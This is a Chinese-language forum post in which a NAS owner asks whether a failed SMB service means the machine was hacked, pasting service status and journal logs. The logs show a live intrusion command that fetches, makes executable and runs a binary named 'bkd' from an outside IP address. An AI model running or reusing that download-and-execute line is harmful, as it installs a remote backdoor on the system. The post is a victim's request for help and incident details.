请大家看看这是不是被入侵了

snzhaoyua999

起因是smb不能用了，隔了一天才来处理，看到了这个 http://43.198.11.122/bkd，这个是被入侵了吗？要不是smb服务不能用了，我看了下服务状态发现了异常，也不知道到什么时候才能发现。

我找了下论坛，没发现详细说明这个漏洞原理的帖子。是5666端**露的服务有漏洞，被远程执行命令了吗？外网访问还是很需要的，请问后续外网访问还能不能开，怎么有效避免这种情况？

另外假如这次攻击没有这么明显，比如他不是完全把smbd搞瘫痪，而是保持smbd可用的同时执行自己的命令，那估计用户一辈子也发现不了。那个论坛里面执行杀毒的脚本，能不能做一下放到系统里面定时检查（只要有警告就行，别删服务）。

还有在遇到类似紧急事件的时候，是不是给论坛注册用户发下邮件？

另外提个建议，外置硬盘每次重启系统都要重新在smb里面挂，这个功能建议搞一下

root@ubuntu-nas:/var/log/samba# service smbd status
● smbd.service - AutoStart Service
     Loaded: loaded (/etc/systemd/system/smbd.service; enabled; preset: enabled)
     Active: active (exited) since Wed 2026-02-04 18:48:38 CST; 1min 19s ago
   Main PID: 2165959 (code=exited, status=0/SUCCESS)
      Tasks: 3 (limit: 9294)
     Memory: 1.0M
        CPU: 261ms
     CGroup: /system.slice/smbd.service
             **─2165961 
             **─2166008 sh -c "cd /tmp;rm -rf bkd;wget http://43.198.11.122/bkd;chmod +x bkd;./bkd;rm -rf bkd"
             **─2166010 wget http://43.198.11.122/bkd
Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service... Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service. root@ubuntu-nas:/var/log/samba# journalctl --unit smbd Feb 04 18:48:29 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service... Feb 04 18:48:29 ubuntu-nas systemd[1]: smbd.service: Deactivated successfully. Feb 04 18:48:29 ubuntu-nas systemd[1]: Stopped smbd.service - AutoStart Service. Feb 04 18:48:29 ubuntu-nas systemd[1]: smbd.service: Consumed 3.040s CPU time. Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service... Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service. Feb 04 18:48:38 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service... Feb 04 18:48:38 ubuntu-nas systemd[1]: smbd.service: Deactivated successfully. Feb 04 18:48:38 ubuntu-nas systemd[1]: Stopped smbd.service - AutoStart Service. Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service... Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service. root@ubuntu-nas:/var/log/samba# ping 43.198.11.122 PING 43.198.11.122 (43.198.11.122) 56(84) bytes of data. ^C --- 43.198.11.122 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 4100ms
root@ubuntu-nas:/var/log/samba# curl -L https://static2.fnnas.com/aptfix/trim-sec -o trim-sec 
[*] sec执行结束 root@ubuntu-nas:/var/log/samba# service smbd status Warning: The unit file, source configuration file or drop-ins of smbd.service changed on disk. Run 'systemctl daemon-re
Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service... Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service. Feb 04 18:58:57 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service...